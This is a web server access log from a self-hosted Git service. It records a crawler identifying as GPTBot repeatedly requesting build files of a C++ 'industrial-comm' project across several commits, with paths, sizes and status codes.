"/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9995] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:28:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10270] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:28:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10011] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:28:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10022] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:28:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 64] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:28:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 116] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:28:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:28:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 116] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:28:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10360] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:28:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:28:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 11278] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:28:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10326] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:28:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 11302] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:28:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 11300] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:28:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 11272] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:28:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11729] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:28:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/update_status.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/update_status.py" -[17/Feb/2026:16:28:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/update_status.py" -[17/Feb/2026:16:28:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11691] [Gzip 3.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11729] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13149] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13180] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10236] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:28:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9986] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:28:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10004] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:28:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10204] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:28:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10205] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:28:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10175] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:28:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 9976] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:28:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11709] [Gzip 3.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:28:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11184] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:28:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=source" [Client 74.7.227.38] [Length 13164] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:28:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 9977] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:28:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 10003] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:28:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10001] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:28:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fcomm_core.dir%2flink.txt" [Client 74.7.227.38] [Length 22772] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:28:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11153] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:28:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10012] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:28:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:28:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11182] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:28:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 224] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:28:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13887] [Gzip 8.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:28:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 224] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:28:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13917] [Gzip 8.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:28:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 224] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:28:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10010] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 